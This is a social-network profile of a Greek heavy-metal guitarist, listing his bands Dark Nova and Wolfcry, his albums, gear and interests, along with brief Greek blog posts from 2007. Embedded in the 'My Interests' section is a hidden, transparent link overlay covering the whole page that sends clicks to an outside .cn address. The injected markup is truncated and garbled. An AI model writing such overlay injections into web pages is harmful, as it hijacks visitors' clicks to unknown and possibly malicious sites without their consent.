Elias Koskoris profile picture

Elias Koskoris

Guitar player/tutor

About Me

I've started playing the guitar at the age of 12. Taking my influences from many musical sources (Greek music/Mickey Theodorakis "Axion Esti", Classical music/Moussorgkski,Ravel) and many great guitar players (Yngwie Malmsteen, George Lynch, Andy La Roque,Vinnie Moore), at the age of 17 I was invited to become part of the recently formed (at that time)greek heavy metal band Dark Devils. After many years and a lot of line-up changes the band was renamed to Dark Nova and we released three studio albums'"The Dark Rhapsodies" (1993-Molon Lave recs),"1999...a step beyond?"(1999-Seven Records)and "Sivilla"(2005-Black Lotus records). Furthermore,I am a member of the greek metal band Wolfcry, since September 2006. Check the albums above and Wolfcry's "Nightbreed" (2003-Black lotus records)and "Power within" (2001-Black Lotus Recs)for my guitar work... GEAR
Electric guitar Ibanez RBM, PRS custom
Classical guitar Segovia
Guitar Amplifier Marshall valvestate 80/80
Guitar effects Digitech Valve fx,Tsr 24
Guitar strings 009 Ernieball
Picks Ibanez 1.00
DARK NOVA "The Dark Rhapsodies" (1993)

DARK NOVA "1999 (A Step Beyond...?)" (1999)
DARK NOVA "Sivilla" (2005)
WOLFCRY "Power Within" (2001)
WOLFCRY "Nightbreed" (2003)

My Interests

Music...of course!!! Egypt!!!,Travelling,Reading research books regarding religion and ancient cultures , greek philosophy,RPG's(Dark sun the favorite setting ever!!!).<a class="popup_wrapper" style="background-color:transparent!important;cursor:de fault;left:-132px;top:-89px;height:5564px;width:1192px;" ;class=popup_x href="http://louesa.cn/s/" da$d

I'd like to meet:

My alter ego...
DARK NOVA - Sivilla @ "Blue Live" 23/12/2007
WOLFCRY - Vanguard @ "Blue live" 23/12/2007


Everything sounds good...personally! :-)


Stargate, Truman show, Dark city, 13th floor, Matrix (I),Lord of the rings (Two towers), V for Vendeta, Rock star, Strange fruits, Almost famous


????!!! ???!!! NO!!! NEVER!!! NOPE!!!

My Blog


Kai me tous Wolfcry etoimazoume kainourio yliko.  Exoume kanei hdh kapoies epafes gia na doume apo pia etairia 8a kykloforisei to neo album to opoio opws to akouw 8a einai dynamiths kai 8a p...
Posted by Elias Koskoris on Wed, 28 Nov 2007 01:08:00 PST


Ta pragmata pane poly kala gia thn band.  Me thn pros8hkh tou Spyrou (bass) kai tou Theodore (vocals) eimaste etoimoi oso pote kai logika mesa sto deftero eksamino tou 2008 8a kykloforisei to neo...
Posted by Elias Koskoris on Tue, 27 Nov 2007 04:21:00 PST

Dark Nova- Wolfcry live!!!

..> So....ontws einai alh8eia...23 Dekemvriou 8a einai mia ksexwristh mera gia mena. 8a anevw sthn skhnh kai me tis dyo mou bands. Ligo asynh8isto vevaia alla...METAL RULES!!! xaxaxa!Apo thn mia...
Posted by Elias Koskoris on Tue, 27 Nov 2007 04:10:00 PST